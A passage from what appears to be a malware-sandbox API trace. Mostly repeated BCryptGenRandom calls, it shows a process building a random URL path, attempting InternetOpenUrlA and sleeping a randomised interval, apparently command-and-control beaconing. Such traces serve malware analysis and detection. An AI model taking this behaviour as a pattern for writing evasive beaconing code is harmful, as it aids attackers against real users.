(hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.300] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.300] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.300] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.300] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.300] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.300] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.300] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0257.301] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.301] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0257.301] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.301] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.301] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.301] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.301] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.301] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.301] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.301] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.302] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.302] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.302] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.302] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.302] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.302] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.302] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.302] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.303] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.303] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.303] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.303] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.303] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.303] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.304] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.304] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.304] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.304] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.304] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.304] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.304] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.304] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.305] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.305] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.305] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.305] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.305] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.305] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.306] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.306] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.306] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.306] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.306] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.307] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.307] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0257.307] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.307] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.307] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.307] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.307] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.307] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0257.308] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.308] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16841, cbBuffer=0x1a, dwFlags=0x2 | out: pbBuffer=0x3a16841) returned 0x0 [0257.308] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.308] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.308] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.308] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.308] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.308] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.309] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.309] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.309] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.309] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.309] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.309] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.309] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.310] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.310] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.310] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.310] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.310] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.310] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.310] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.310] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.310] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.311] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.311] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.311] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.311] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.311] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.311] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.312] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.312] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0257.312] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.312] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.312] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.312] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.312] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.312] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.313] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.313] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.313] GetProcessHeap () returned 0x440000 [0257.313] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4726f0 [0257.313] lstrcpyA (in: lpString1=0x4726f0, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0257.313] lstrcatA (in: lpString1="\x04", lpString2="/ms80Pa8iqeopIqyh/brMUxBwcrljga7WV2s0gbcevg21sCcafoba21g7pyifYwc/omrql21xq1eoylT4cPm8ujahL/" | out: lpString1="\x04/ms80Pa8iqeopIqyh/brMUxBwcrljga7WV2s0gbcevg21sCcafoba21g7pyifYwc/omrql21xq1eoylT4cPm8ujahL/") returned="\x04/ms80Pa8iqeopIqyh/brMUxBwcrljga7WV2s0gbcevg21sCcafoba21g7pyifYwc/omrql21xq1eoylT4cPm8ujahL/" [0257.313] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0257.313] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/ms80Pa8iqeopIqyh/brMUxBwcrljga7WV2s0gbcevg21sCcafoba21g7pyifYwc/omrql21xq1eoylT4cPm8ujahL/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0257.313] GetProcessHeap () returned 0x440000 [0257.313] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4726f0 | out: hHeap=0x440000) returned 1 [0257.313] GetProcessHeap () returned 0x440000 [0257.313] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a16800 | out: hHeap=0x440000) returned 1 [0257.314] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0257.314] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0257.314] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.314] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0257.314] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0257.314] Sleep (dwMilliseconds=0x1826f) [0257.546] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.546] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0257.546] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.546] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0257.546] GetProcessHeap () returned 0x440000 [0257.546] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a17ac0 [0257.546] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.547] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0257.547] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.547] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17ac1, cbBuffer=0x18, dwFlags=0x2 | out: pbBuffer=0x3a17ac1) returned 0x0 [0257.547] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.547] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.547] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.547] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.548] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.548] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.548] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.548] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.548] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.548] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.548] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.548] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.549] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.549] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.549] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.549] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.549] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.549] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.549] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.550] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.550] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.550] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.550] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.550] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.550] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.550] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.551] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.551] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.551] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.551] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.551] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.551] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.551] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.551] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0257.552] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.552] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17ad9, cbBuffer=0x14, dwFlags=0x2 | out: pbBuffer=0x3a17ad9) returned 0x0 [0257.552] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.552] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.552] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.552] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.552] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.553] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.553] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.553] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.553] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.553] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.553] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.553] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.553] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.554] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.554] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.554] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.554] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.554] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.554] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.554] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.555] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.555] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.555] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.555] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.555] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.555] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.556] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.556] BCryptGenRandom (in: hAlgorithm=0x0, 